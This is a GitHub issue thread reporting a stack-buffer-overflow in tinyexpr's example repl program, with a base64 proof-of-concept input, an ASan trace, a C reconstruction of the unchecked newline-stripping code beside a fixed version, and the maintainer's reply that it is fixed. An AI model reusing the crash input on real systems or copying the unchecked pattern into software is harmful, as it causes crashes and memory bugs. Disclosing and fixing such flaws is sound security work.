codeplea/tinyexpr

Potential Security Issue

huntr-helper opened this issue · 6 comments

👋 Hello, we've received a report for a potential medium severity security issue in your repository.

Next Steps

1๏ธโƒฃ Visit https://huntr.dev/bounties/1-other-codeplea/tinyexpr for more advisory information.

2๏ธโƒฃ Sign-up to validate or speak to the researcher for more assistance.

3๏ธโƒฃ Propose a patch or outsource it to our community.


Confused or need more help?

  • Join us on our Discord and a member of our team will be happy to help! 🤗

  • Speak to a member of our team: @JamieSlome


This issue was automatically generated by huntr.dev - a bug bounty board for securing open source code.

Just post it here or email me.

@codeplea:

Stack-based Buffer Overflow in codeplea/tinyexpr

โœ๏ธ Description

Whilst experimenting with repl built from commit 61af1d, with Clang 10 (+ASan) on Ubuntu 20.04.2 LTS, we discovered an expression containing 4 null characters after a newline which, due to insufficient bounds checking, triggers a stack-buffer-overflow.

๐Ÿ•ต๏ธโ€โ™‚๏ธ Proof of Concept

echo "c3FydCg1XjIrN14yKzExXjIrKDgtMileMikKAAAAAAA=" | base64 -d | ../repl

The above POC produces this ASan stack trace:

==3156664==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffeadf9cf6f at pc 0x0000004c4c28 bp 0x7ffeadf9cf30 sp 0x7ffeadf9cf28
READ of size 1 at 0x7ffeadf9cf6f thread T0
    #0 0x4c4c27 in readline /root/tinyexpr/repl.c:22:9
    #1 0x4c4c27 in repl /root/tinyexpr/repl.c:49:22
    #2 0x4c4c27 in main /root/tinyexpr/repl.c:73:9
    #3 0x7ff914e5e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
    #4 0x41c6cd in _start (/root/tinyexpr/repl+0x41c6cd)

Address 0x7ffeadf9cf6f is located in stack of thread T0 at offset 47 in frame
    #0 0x4c454f in main /root/tinyexpr/repl.c:65

  This frame has 3 object(s):
    [32, 36) 'err.i.i' (line 36)
    [48, 1072) 'buf.i.i' (line 12) <== Memory access at offset 47 underflows this variable
    [1200, 1204) 'err.i' (line 36)
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork
      (longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow /root/tinyexpr/repl.c:22:9 in readline

💥 Impact

This vulnerability is capable of crashing the software and/or triggering unintended consequences of overflowing the stack buffer.

Refs:

if (line[len - 1] == '\n') {
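The defect the ASan frame points at, as an added example that is not the project's own repl.c: a reconstruction of the newline-stripping check next to a hardened form, driven through real fgets() by constructed input shaped like the PoC (an expression, a newline, then NUL bytes). The function names, the 1024-byte buffer, the exact NUL count and the use of POSIX fmemopen() are assumptions.

```c
#define _POSIX_C_SOURCE 200809L   /* for fmemopen() */
#include <stdio.h>
#include <string.h>

/* Vulnerable pattern, reconstructed from the ASan frame (not repl.c verbatim).
 * fgets() stores any NUL bytes it reads, so the PoC's second "line" begins with
 * '\0': strlen() is 0 and line[len - 1] is line[(size_t)-1], a one-byte read
 * just before the array, matching "offset 47 underflows this variable". */
void strip_newline_unchecked(char *line) {
    size_t len = strlen(line);
    if (line[len - 1] == '\n')
        line[len - 1] = '\0';
}

/* Hardened form: index the buffer only when it holds at least one byte. */
void strip_newline_checked(char *line) {
    size_t len = strlen(line);
    if (len > 0 && line[len - 1] == '\n')
        line[len - 1] = '\0';
}

/* Run every fgets() result from `in` through the checked stripper. Returns the
 * number of results; *shortest gets the shortest stripped length (0 for the
 * NUL-only line), which is the case the unchecked version mishandles. */
int read_lines_checked(FILE *in, size_t *shortest) {
    char buf[1024];
    int lines = 0;
    *shortest = (size_t)-1;
    while (fgets(buf, sizeof buf, in)) {
        strip_newline_checked(buf);
        size_t len = strlen(buf);
        if (len < *shortest) *shortest = len;
        lines++;
    }
    return lines;
}

/* Constructed stand-in for the PoC bytes: an expression, '\n', then four NULs. */
static char POC_INPUT[] = "sqrt(5^2+7^2+11^2+(8-2)^2)\n\0\0\0\0";

/* Feed the constructed bytes to the checked reader. sizeof - 1 drops the string
 * literal's own terminator so the embedded NULs are the last bytes read. */
int run_poc_checked(size_t *shortest) {
    FILE *in = fmemopen(POC_INPUT, sizeof POC_INPUT - 1, "r");
    if (!in) return -1;
    int n = read_lines_checked(in, shortest);
    fclose(in);
    return n;
}
```

Built with -fsanitize=address, strip_newline_unchecked on the zero-length line reports the same one-byte stack-buffer-overflow READ as the trace above, while the checked variant and run_poc_checked complete normally.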

Thanks for the report. I believe it's fixed now. (Please let me know if that isn't the case.)

I want to point out that this is an issue with the example program, repl. It does not appear to be an issue with the tinyexpr library itself. Any users of the tinyexpr C library should be unaffected.

@mortie I believe this is your code. Just flagging you in case you've also used this code elsewhere.

@codeplea - if you validate and confirm the fix on the platform, we can reward you the bounty for the fix.

https://huntr.dev/bounties/1-other-codeplea/tinyexpr

Cheers! 🍰